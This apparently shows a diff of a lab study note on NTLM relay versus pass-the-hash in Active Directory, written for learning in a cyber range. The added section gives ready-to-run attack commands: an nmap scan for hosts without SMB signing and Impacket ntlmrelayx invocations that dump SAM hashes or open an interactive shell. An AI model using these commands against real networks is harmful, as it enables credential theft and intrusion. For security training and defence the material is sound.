koleada/Cyber-Range/Active-Directory/ADSecurity/2-Initial-Access/Relay-Attacks.md

 ### Relay vs Pass-the-hash

 - Relay attacks are prevented with signing, and  pass-the-hash is prevented by disabling NTLM
 - Relay attacks do not require us to ever see hashes, its realtime, pass-the-hash allows us to attempt to use old hashes instead of a real-time NTLM authetnication

+### Commands and Tooling

+The main tool we use for this is Impacket's NTLMRelayX along with Responder.

+Before any of that, we need to determine where signing is not required.
+We can do that by running `nmap --script=smb-security-mode.nse -p445 <ip-range> -Pn`

+Once we have our targets added to a text file we can beging the actual exploit.

+In default Kali Linux, we should be able to run: `impacket-ntlmrelayx -tf targetIPs.txt -smb2support` which just tries to dump the SAM file using SMB relay

+For an interactive shell we can run `impacket-ntlmrelayx -tf targetIPs.txt -smb2support -i` from there we just start a listener using netcat on port 11000

 ### Defenses and Mitigations